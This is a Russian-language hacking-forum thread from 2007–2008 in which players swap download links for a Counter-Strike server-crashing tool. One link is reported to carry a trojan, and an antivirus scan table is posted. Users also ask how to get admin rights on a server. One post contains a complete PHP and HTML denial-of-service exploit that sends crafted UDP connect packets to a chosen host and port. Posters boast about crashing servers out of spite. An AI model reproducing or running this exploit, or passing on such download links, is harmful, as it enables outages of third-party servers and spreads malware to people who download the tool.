ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Counter-Strike Dos exploit (https://forum.antichat.xyz/showthread.php?t=24486)

ssk.ex0.uf0 17.04.2007 12:21

Цитата:

Сообщение от system_32
А для чего крушить КС то :?

Как для чего? вот бывает такое что один за одним хэд шот...а тут тя раз и модер какой нить банит... :cool:
ЗЫ не поверите...немогу найти exe'шник...посеял...если у кого остался...очень прошу поделиться...фаловый хост любой подойдёт...

espe2k 18.04.2007 14:26

Цитата:

Сообщение от ssk.ex0.uf0
Как для чего? вот бывает такое что один за одним хэд шот...а тут тя раз и модер какой нить банит... :cool:
ЗЫ не поверите...немогу найти exe'шник...посеял...если у кого остался...очень прошу поделиться...фаловый хост любой подойдёт...

http://anonymous.h17.ru/CSHack.exe

Ух, завалил несчастный сервер местного КСера... :rolleyes:

сплоит +1

ssk.ex0.uf0 18.04.2007 14:50

http://anonymous.h17.ru/CSHack.exe
По этому линку немогу скачать...
Если у кого есть возможность залить\перезалить...буду благодарен...

ice1k 18.04.2007 14:56

Цитата:

Сообщение от ssk.ex0.uf0
http://anonymous.h17.ru/CSHack.exe
По этому линку немогу скачать...
Если у кого есть возможность залить\перезалить...буду благодарен...

--http://ice1k.info/files/cshack.exe

SHaDoW[RF] 19.04.2007 15:14

а как узнать пасс?

Darkweider 19.04.2007 17:24

Убивает сервак насмерть=)

Eng1nE 19.04.2007 19:40

Вопрос а есть какой-нибудь метод полу4ить админские права на серваке? Такой
путь cstrike\addons\amxmodx\configs\users.ini. Там можно добавить админа. Кроме трояна и др. Есть соображения по этому поводу?))

Isis 20.04.2007 01:09

Цитата:

Сообщение от Eng1nE
Вопрос а есть какой-нибудь метод полу4ить админские права на серваке? Такой
путь cstrike\addons\amxmodx\configs\users.ini. Там можно добавить админа. Кроме трояна и др. Есть соображения по этому поводу?))

Есть...можно выпить пивка или накурица с админом, мб скажет пасс или даст админа даже =)

gold-goblin 04.12.2007 19:02

выложите пожалуйста еще раз этот чуда ехе

Don1=2 04.12.2007 19:14

это случайно не с красненькой иконкой, который коннектится вначале под ником Born to be pig... ? и только со второго раза кладёт сервак?

gold-goblin 04.12.2007 19:15

Вроде он

Lomaka 06.12.2007 12:25

На сколько я понимаю, сплойты и экзешник валят Nosteam сервера, а для Steam есть какой-нить сплойт или экзешник?

Don1=2 06.12.2007 20:54

/me пацталом.... нет. есть тока .txt сплоит... его надо вставлять вместо имени и коннактицо

inlanger 06.12.2007 21:00

перевыложите куда-нить...а то все ссылки битые.

kLAZE 16.12.2007 12:43

Цитата:

Сообщение от SHaDoW[RF]
а как узнать пасс?

Никак. Ибо спроси у админа =))

Tw!m4 16.12.2007 17:47

а есть ещё актуальные сплойты под кс?

.Striker 10.02.2008 00:06

и те старые еще актуальны, но не на всех сервах

большое спасибо ребята за работу!!

DCRM 10.02.2008 02:59

Цитата:

Сообщение от inlanger
перевыложите куда-нить...а то все ссылки битые.


Ещё нашёл сплоит...
1я часть:
Код:

<html>
<head>
<title>PHP Counter Strike DOS Poc</title>

<style type="text/css">

input {
width: 150px;
}

td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}

span.err {
color: red;
}

span.ok {
color: green;
}

</style>

</head>

<body onload="checkpass()">

<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">

<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>

<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>

<tr>
<td>&nbsp;</td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>

<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>


<tr>
<td>&nbsp;</td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>


</table>
<br/>
</form>
</div>
<center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
</body>
</html>

2я часть
PHP код:

<?php

/*
CS-dos exploit made by gemaglabin
Bug was discovered by .FUF # 111596
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/

ini_set("display_errors","0");

function 
HELLO_PACKET()
{
$packet pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return 
$packet;
}

function 
CHALLENGE_PACKET()
{
$packet pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return 
$packet;
}

function 
LOGIN_PACKET_4()
{
global 
$cookie;
global 
$password;
$packet pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return 
$packet;
}

function 
LOGIN_PACKET_2()
{
global 
$cookie;
global 
$password;
$packet pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return 
$packet;
}

function 
dowork($host,$port,$password,$auth)
{
global 
$password;
global 
$cookie;
# connecting to target host
$fsock fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!
$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp fread($fsock,100);
# grab cookies from packet
$cookie substr($resp,strpos($resp,"A00000000")+10);
$cookie substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$authfwrite $fsock,LOGIN_PACKET_4());else fwrite $fsock,LOGIN_PACKET_2());
$resp fread($fsock,100);
}
}

IF (isset(
$_POST['host']) && isset($_POST['port']))
{
IF (empty(
$_POST['pass'])) $password "123";
else 
$password $_POST['pass'];
$fserver $_POST['host'];
$fport $_POST['port'];
if (isset(
$_POST['auth'])) $fauth true;else $fauth=false;
# we have to connect 2 times
$result dowork($fserver,$fport,$password,$fauth);
$result dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>


Витян 10.02.2008 20:41

по твоей ссылке троян

DCRM 11.02.2008 03:00

Цитата:

Сообщение от Витян
по твоей ссылке троян

Хм... я всего лишь выцепил её из Гугля, НОД, Каспер и DrWeb молчали... хотя что ты хочешь ожидать от такой проги то)
Код:

Антивирус        Версия        Обновление        Результат
AhnLab-V3        2008.2.4.10        2008.02.04        -
AntiVir        7.6.0.62        2008.02.04        TR/Agent.act.2
Authentium        4.93.8        2008.02.04        -
Avast        4.7.1098.0        2008.02.03        Win32:Agent-PJA
AVG        7.5.0.516        2008.02.04        Generic6.WSG
BitDefender        7.2        2008.02.04        Trojan.Generic.15882
CAT-QuickHeal        9.00        2008.02.04        -
ClamAV        0.92        2008.02.04        -
DrWeb        4.44.0.09170        2008.02.04        -
eSafe        7.0.15.0        2008.01.28        suspicious Trojan/Worm
eTrust-Vet        31.3.5509        2008.02.04        -
Ewido        4.0        2008.02.04        -
FileAdvisor        1        2008.02.04        High threat detected
Fortinet        3.14.0.0        2008.02.04        Grayware
F-Prot        4.4.2.54        2008.02.03        -
F-Secure        6.70.13260.0        2008.02.04        -
Ikarus        T3.1.1.20        2008.02.04        Trojan.Win32.Agent.act
Kaspersky        7.0.0.125        2008.02.04        -
McAfee        5222        2008.02.04        -
Microsoft        1.3204        2008.02.04        -
NOD32v2        2847        2008.02.04        -
Norman        5.80.02        2008.02.04        -
Panda        9.0.0.4        2008.02.04        Trj/Downloader.MDW
Prevx1        V2        2008.02.04        Generic.Malware
Rising        20.29.22.00        2008.01.30        -
Sophos        4.26.0        2008.02.04        Mal/Generic-A
Sunbelt        2.2.907.0        2008.02.02        -
Symantec        10        2008.02.04        Trojan Horse
TheHacker        6.2.9.208        2008.02.04        -
VBA32        3.12.6.0        2008.02.03        Trojan.Win32.Agent.act
VirusBuster        4.3.26:9        2008.02.04        -
Webwasher-Gateway        6.6.2        2008.02.04        Trojan.Agent.act.2

p.s. А скрин то я с этого exe делал... ну да ладно)


Время: 20:42